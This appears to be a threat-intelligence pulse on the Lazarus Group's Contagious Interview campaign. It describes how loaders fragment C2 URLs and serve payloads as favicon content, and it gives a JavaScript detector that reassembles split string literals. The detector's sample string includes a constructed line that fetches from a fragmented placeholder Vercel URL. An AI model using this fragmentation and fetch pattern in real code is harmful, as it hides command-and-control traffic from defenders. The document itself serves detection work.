Pulse: Lazarus Group Enhances Malware with New OtterCookie Payload Delivery Technique
TLP: WHITE | Author: PetrP.73 | Created: 2025-08-02 | Modified: 2025-09-01 | 39 IOCs | Medium volume
The Contagious Interview campaign, attributed to the Lazarus Group, has changed how it delivers its primary payloads (BeaverTail, InvisibleFerret and OtterCookie). Recent analysis shows the group obfuscating its loader code so that automated detection tools have a harder time flagging it. One tactic is to fragment URLs within the code: the command and control (C2) address never appears as a single string literal, so static scanners and signatures keyed on the domain do not match. The staging infrastructure sits on a legitimate hosting platform, Vercel (vercel.app), and the payload is served disguised as innocuous favicon content, so the download blends in with ordinary web traffic. The request is triggered through a constant named "doing", whose initialisation issues the fetch to the C2 server. Detection therefore has to reassemble concatenated or joined string fragments before matching domain and URL indicators, rather than searching the raw source for them.
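As an added example (not code from the pulse, and not the malware's own code), the following JavaScript shows why URL fragmentation defeats a naive string scan and how a detector can undo it: it finds runs of string literals joined only by `+` or `,` (concatenation, or array elements later glued together by `.join("")`), reassembles them, and only then applies a URL regex. The sample source, the placeholder domain example-app.vercel.app and the `doing` variable are constructed for illustration and are not indicators from this pulse.

```javascript
// Added example (not from the pulse or the malware): static reassembly of
// fragmented string literals so a scanner can recover URLs that were split
// across concatenations or array joins.

// Constructed sample mimicking the fragmentation pattern. No single literal
// contains a recognisable URL, so a plain grep for "vercel.app" finds nothing.
// The domain and paths are placeholders, not the campaign's real C2.
const SAMPLE_SOURCE = `
const parts = ["htt", "ps:/", "/", "example-app", ".verc", "el.app", "/fav", "icon.ico"];
const endpoint = "https" + "://" + "example-app" + ".vercel" + ".app" + "/api" + "/beacon";
const doing = fetch(parts.join("")).then(r => r.text());
`;

const URL_RE = /https?:\/\/[^\s"'`]+/g;
// Matches a JS string literal in any of the three quote styles. It does not
// handle nested template expressions, which is sufficient for the simple
// concatenation patterns targeted here.
const LITERAL_RE = /(["'`])((?:\\.|(?!\1)[^\\\n])*)\1/g;

// Naive scan: look for URLs in the raw source text. Fragmentation defeats it.
function naiveUrls(source) {
  return source.match(URL_RE) || [];
}

// Collect every string literal, then merge consecutive literals whose
// separating source text is only whitespace plus '+' or ','. Each merged run
// is what the code would produce at runtime via concatenation or join("").
function reassembledStrings(source) {
  const literals = [];
  let m;
  while ((m = LITERAL_RE.exec(source)) !== null) {
    literals.push({ text: m[2], start: m.index, end: m.index + m[0].length });
  }
  const runs = [];
  let current = null;
  for (const lit of literals) {
    const gap = current ? source.slice(current.end, lit.start) : "";
    if (current && /^\s*[+,]\s*$/.test(gap)) {
      current.text += lit.text;
      current.end = lit.end;
    } else {
      current = { text: lit.text, start: lit.start, end: lit.end };
      runs.push(current);
    }
  }
  return runs.map(r => r.text);
}

// Apply the URL regex to the reassembled strings instead of the raw source.
function findHiddenUrls(source) {
  const found = new Set();
  for (const s of reassembledStrings(source)) {
    for (const u of s.match(URL_RE) || []) found.add(u);
  }
  return [...found];
}

console.log("naive scan:", naiveUrls(SAMPLE_SOURCE));
console.log("reassembled:", findHiddenUrls(SAMPLE_SOURCE));
```

Run it with `node` to see the naive scan return nothing while the reassembly step recovers both hidden URLs. In practice the same pass should feed a domain and URL indicator match (for example the vercel.app-hosted paths in this pulse) rather than a hard-coded regex, and it will not unpick fragments that are decoded from base64 or hex at runtime; those need emulation or a runtime hook on the request API.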
Indicators of Compromise (1 of 39 shown)
Indicator types in this pulse: FileHash-MD5, FileHash-SHA256, domain, URL

Type         | Indicator                         | Description | Created
FileHash-MD5 | 56e15ef3b5e5f169fc063f8d3e88288e  |             | 2025-08-02